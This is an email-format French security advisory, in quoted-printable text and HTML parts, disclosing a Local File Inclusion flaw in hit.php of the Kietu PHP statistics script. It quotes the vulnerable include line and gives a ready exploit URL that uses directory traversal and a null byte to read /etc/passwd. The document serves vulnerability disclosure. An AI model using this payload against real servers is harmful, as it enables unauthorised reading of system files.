------=_Part_561_6971320.1159049290474 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline [::] Produit : Kietu [::] Langage : PHP [::] Description : Kietu? est un script =E9crit en PHP, qui requiert une base de donn=E9e mySQL, et qui vous permet de g=E9n=E9rer et consulter les statistiques d'acc=E8s =E0 votre site web. [::] Site web officiel : http://www.Kietu.net/ [::] Page vuln=E9rable : hit.php [::] Faille de s=E9curit=E9 : Local File Inclusion [::] Code vuln=E9rable : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php'; [::] Exploitation : http://localhost/kietu/hit.php?url_hit=3D../../../../../etc/passwd%00 @ [::] Cr=E9dit : Avis de s=E9curit=E9 par cdg393 -> cdg393_gmail_com :) ------=_Part_561_6971320.1159049290474 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline [::] Produit &nb= sp; : Kietu<br><br>[::] Langage &n= bsp;  = ; : PHP<br><br>[::] Description &n= bsp; : Kietu? est un script =E9crit en PHP, q= ui requiert une base de donn=E9e mySQL, et qui vous permet de g=E9n=E9rer e= t consulter les statistiques d'acc=E8s =E0 votre site web. <br><br>[::] Site web officiel : <a hre= f=3D"http://www.Kietu.net/">http://www.Kietu.net/</a><br><br>[::] Page vuln= =E9rable : hit.php<br><br>[= ::] Faille de s=E9curit=E9 : Local File Inclu= sion<br><br>[::] Code vuln=E9rable  = ; : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php'= ; <br><br>[::] Exploitation &n= bsp; : <a href=3D"http://localhost/kietu/hit.php?url_hit=3D../.= ./../../../etc/passwd%00">http://localhost/kietu/hit.php?url_hit=3D../../..= /../../etc/passwd%00</a><br><br>@ [::] Cr=E9dit &nbs= p; = : Avis de s=E9curit=E9 par cdg393 -> cdg393_gmail_com :) ------=_Part_561_6971320.1159049290474--